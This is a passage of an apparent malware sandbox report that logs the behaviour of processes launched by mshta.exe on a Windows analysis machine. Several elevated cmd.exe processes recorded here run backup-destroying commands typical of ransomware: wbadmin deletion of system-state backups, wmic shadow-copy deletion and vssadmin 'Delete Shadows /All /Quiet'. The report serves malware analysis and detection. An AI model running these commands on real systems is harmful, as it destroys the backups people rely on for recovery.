| System | Get Time | type = Performance Ctr, time = 25609370668 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25610930328 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25610941704 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25614027504 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25614039273 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25615873031 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25615887763 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25618743383 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25618756443 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25620320480 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25620332541 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25623407956 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25623420740 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25626569407 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25626582856 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25629653478 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25629666228 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25633890794 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25633905729 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25635918663 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25635935090 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25639087518 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25639102426 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25642151492 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25642164905 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643762366 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643777200 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25646883977 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25646896214 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25649993078 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25650007767 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25651540681 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25651556639 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25655594412 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25655605656 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25656215665 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25656230802 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25659368999 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25659383507 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25660912098 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25660927948 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25664213455 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25664228339 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25665600156 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25665616594 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25668761496 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25668776566 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25693199633 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25693215875 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25695308199 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25695325759 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25696844746 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25696857393 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25701156931 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25701169983 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25703151143 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25703163774 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25706598615 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25706610104 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25709362722 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25709375842 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717283985 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717296010 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717318412 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717330127 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25718753713 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25718766875 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25720338232 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25720354950 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25723458252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25723473535 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25727305848 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25727318680 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729701230 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729716658 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25731729813 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25731749582 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25734398148 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25734410285 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25735909121 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25735921428 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25739064726 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25739076179 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25740602943 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25740615231 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25742187754 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25742200477 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25769417907 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25769432829 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25771866948 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25771879356 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25773417736 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25773431257 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776559756 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776575046 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25780449459 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25780466125 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784700957 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784716284 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784741668 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784756570 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25787529882 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25787545586 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25790593182 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25790610061 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792217826 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792232998 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795288671 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795321940 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796891987 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796922420 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800025758 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800058953 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25803155963 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 |
Thread 0x720
8
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25565310580 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25565324580 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25572025696 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25617147435 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25634656132 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25793183706 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25814967956 |
|
1 |
Thread 0xd90
10
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x716a0000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:35 (UTC) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 263234 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:36 (UTC) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xef8
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x716a0000 |
|
1 |
Thread 0xef4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Process #12: cmd.exe
56
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:18, Reason: Child Process |
| Unmonitor | End Time: 00:04:28, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfb0 |
| Parent PID | 0xec8 (c:\windows\syswow64\mshta.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F1C
0x
654
|
Threads
Thread 0xf1c
56
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
2 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 98 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #13: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:18, Reason: Child Process |
| Unmonitor | End Time: 00:04:47, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x868 |
| Parent PID | 0xec8 (c:\windows\syswow64\mshta.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
668
0x
FD0
0x
9E4
|
Threads
Thread 0x668
59
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Process | Create | process_name = C:\WINDOWS\System32\Wbem\WMIC.exe, os_pid = 0xdb4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 40010004 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 |
Process #15: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:42, Reason: Self Terminated |
| Monitor Duration | 00:00:23 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf28 |
| Parent PID | 0xec8 (c:\windows\syswow64\mshta.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E90
0x
C70
|
Threads
Thread 0xe90
62
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
